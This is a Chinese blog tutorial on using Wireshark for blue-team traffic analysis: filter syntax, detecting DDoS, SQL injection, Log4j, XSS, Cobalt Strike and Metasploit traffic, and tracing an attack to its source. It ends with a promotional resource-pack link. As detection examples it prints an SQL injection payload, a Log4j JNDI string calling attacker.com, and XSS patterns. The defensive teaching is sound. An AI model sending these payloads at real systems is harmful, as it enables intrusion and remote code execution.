Wireshark 是护网蓝队的 “流量透视镜”,能从海量网络包中识别攻击、追溯源头。本文将从基础操作、过滤语法、护网实战场景、攻击溯源四个维度,带你掌握 Wireshark 的全流程用法,让你在护网中快速定位攻击、还原真相。
一、Wireshark 基础操作与环境配置(入门必备)
1. 安装与抓包准备
-
安装:官网下载 Wireshark(www.wireshark.org),Windows、Linux、macOS 均支持。
-
抓包接口选择:
-
打开 Wireshark → 点击 “捕获接口” → 选择连接目标网络的网卡(如 “以太网”“Wi-Fi”)。
-
若需抓包服务器流量,可在服务器上安装 Wireshark,或使用端口镜像(将目标端口流量镜像到监控端口)。
-
2. 核心界面与功能区
-
Packet List(数据包列表):显示所有捕获的数据包,包含时间戳、源 IP、目的 IP、协议、长度等信息。
-
Packet Details(数据包详情):选中某个数据包后,显示其分层详情(如以太网层、IP 层、TCP 层、应用层)。
-
Packet Bytes(数据包字节):以十六进制和 ASCII 码显示数据包的原始内容。
-
Filter(过滤器):输入过滤规则,筛选感兴趣的数据包(如仅显示 HTTP 流量)。
3. 过滤语法与常用规则
Wireshark 的过滤语法是流量分析的核心,需熟练掌握:
-
协议过滤:
tcp、udp、http、dns等,如http仅显示 HTTP 流量。 -
IP 过滤:
ip.addr == ``192.168.1.100(源或目的 IP 为 192.168.1.100);ip.src == ``192.168.1.100(源 IP 为 192.168.1.100);ip.dst == ``192.168.1.100(目的 IP 为 192.168.1.100)。 -
端口过滤:
tcp.port == 80(TCP 端口为 80);udp.port == 53(UDP 端口为 53,DNS)。 -
组合过滤:
ip.src == ``192.168.1.100`` && tcp.port == 80(源 IP 为 192.168.1.100 且 TCP 端口为 80 的流量)。
二、护网实战:攻击流量识别(精准定位)
1. DDoS 攻击识别
DDoS 攻击是护网中常见的干扰手段,Wireshark 可快速识别:
-
SYN 洪水攻击:
-
过滤规则:
tcp.flags.syn == 1 && tcp.flags.ack == 0。 -
分析方法:统计单位时间内的 SYN 包数量(如 1 秒内超过 1000 个),且源 IP 随机、目的端口固定(如 80),则判定为 SYN 洪水。
-
-
UDP 洪水攻击:
-
过滤规则:
udp && ip.len > 1000(大流量 UDP 包)。 -
分析方法:若大量 UDP 包长度超过 1000 字节,且目的端口非业务端口(如 123、53 外的端口),则可能是 UDP 洪水。
-
2. Web 攻击识别
Web 攻击(SQL 注入、XSS、Log4j 等)的流量特征明显,Wireshark 可有效识别:
-
SQL 注入攻击:
-
过滤规则:
http.request.uri contains "id=" && http.request.uri contains "'"(含单引号的 SQL 注入请求)。 -
实战案例:某政务系统遭遇 SQL 注入攻击,过滤出请求
GET /index.php?id=1' UNION SELECT 1,2,3--+ HTTP/1.1,确认存在注入漏洞。
-
-
Log4j 攻击:
-
过滤规则:
http.request.header contains "${jndi:"(含 Log4j Payload 的请求头)。 -
分析方法:若请求头中包含
${jndi:ldap://``attacker.com/...``},则判定为 Log4j 攻击。
-
-
XSS 攻击:
- 过滤规则:
http.request.uri contains "<script>" || http.request.uri contains "alert("(含 XSS Payload 的请求)。
- 过滤规则:
3. 远控工具通信识别
红队常用的远控工具(如 Cobalt Strike、Metasploit)通信流量有明显特征:
-
Cobalt Strike Beacon 通信:
-
过滤规则:
tcp.port == 443 && !http(非 HTTP 的 443 端口加密流量)。 -
分析方法:追踪流(右键 “Follow → TCP Stream”),若流量为加密数据且无明显 HTTP 请求响应,则可能是 Beacon 通信。
-
-
Metasploit Meterpreter 通信:
-
过滤规则:
tcp.port == 4444(Metasploit 默认端口)。 -
分析方法:追踪流,若看到
getsystem、shell等命令,则确认是 Meterpreter 通信。
-
4. 内网横向移动识别
红队在内网横向移动时,会产生大量异常流量,Wireshark 可识别:
-
SMB 爆破攻击:
-
过滤规则:
smb && smb.cmd == 115(SMB 登录请求)。 -
分析方法:若短时间内来自同一 IP 的大量 SMB 登录请求(
smb.cmd == 115),且多数登录失败,则判定为 SMB 爆破。
-
-
远程桌面(RDP)攻击:
-
过滤规则:
tcp.port == 3389(RDP 端口)。 -
分析方法:若大量 RDP 连接请求来自陌生 IP,且登录失败次数多,则可能是 RDP 爆破。
-
三、攻击溯源:从流量到攻击源(还原真相)
1. 攻击时间线还原
通过 Wireshark 的 “时间戳” 和 “流量顺序”,可还原攻击的完整时间线:
- 步骤:
-
按时间排序数据包(点击 “Time” 列)。
-
从攻击开始的第一个数据包(如 SQL 注入请求)开始,依次追踪后续的横向移动、数据窃取等流量。
-
标记关键数据包(右键 “Mark Packet”),整理成攻击时间线文档。
2. 攻击源 IP 定位
- 步骤:
-
找到攻击的第一个数据包,查看 “ip.src” 字段(攻击源 IP)。
-
对攻击源 IP 进行 WHOIS 查询(Wireshark 插件 “Whois Lookup” 或在线工具),获取 IP 归属地、所属机构。
-
结合威胁情报平台(如微步在线、360 威胁情报),查询该 IP 是否为已知恶意 IP。
3. 攻击工具与手法分析
- 步骤:
-
追踪攻击流量的 TCP 流或 UDP 流,分析 Payload 特征(如 SQL 注入的 Payload、远控工具的通信协议)。
-
对比已知攻击工具的特征库(如 Cobalt Strike 的 Beacon 特征、Metasploit 的 Meterpreter 特征),确定攻击工具。
-
根据工具和手法,判断攻击组织(如 APT 组织、黑产团伙)。
四、进阶技巧与排坑指南(提升效率)
1. 实用插件推荐
-
Whois Lookup:快速查询 IP 归属地和所属机构。
-
TCP Reassembly:自动重组 TCP 分片,确保能看到完整的应用层数据。
-
HTTP Parser:解析 HTTP 请求和响应,提取 URL、Cookie、POST 数据等。
2. 大流量分析技巧
-
数据过滤:先通过过滤规则筛选出感兴趣的流量(如仅 HTTP),再进行分析,避免处理海量无关数据。
-
数据导出:将筛选后的流量导出为 PCAP 文件(“File → Export Specified Packets”),便于后续深入分析或分享。
3. 常见问题解决
-
抓包无数据:检查网卡选择是否正确,是否有流量经过该网卡;若为远程抓包,检查端口镜像配置是否正确。
-
流量解析异常:确保 Wireshark 已安装对应的协议解析器(如 HTTPS 解析需安装 SSL 证书)。
-
过滤规则不生效:检查过滤语法是否正确,如 IP 地址是否带引号(Wireshark 过滤中 IP 地址无需引号)。
想系统学习流量分析、从数据包中挖掘攻击线索的网安爱好者,可以看看下面。
互动话题:如果你想学习更多
**护网方面**的知识和工具,可以看看以下面!
给大家分享一份全套的网络安全学习资料,给那些想学习 网络安全的小伙伴们一点帮助!
①网络安全学习路线
②20份渗透测试电子书
③安全攻防357页笔记
④50份安全攻防面试指南
⑤安全红队渗透工具包
⑥网络安全必备书籍
⑦100个漏洞实战案例
⑧安全大厂内部视频资源
⑨历年CTF夺旗赛题解析
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。
**读者福利 |**【优快云大礼包】最新网络安全/网安技术资料包~282G!无偿分享!!! **(安全链接,放心点击)**!
如果二维码失效,可以点击下方👇链接去拿,一样的哦
**读者福利 |**【优快云大礼包】最新网络安全/网安技术资料包~282G!无偿分享!!! **(安全链接,放心点击)**!
扫一扫
1万+
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
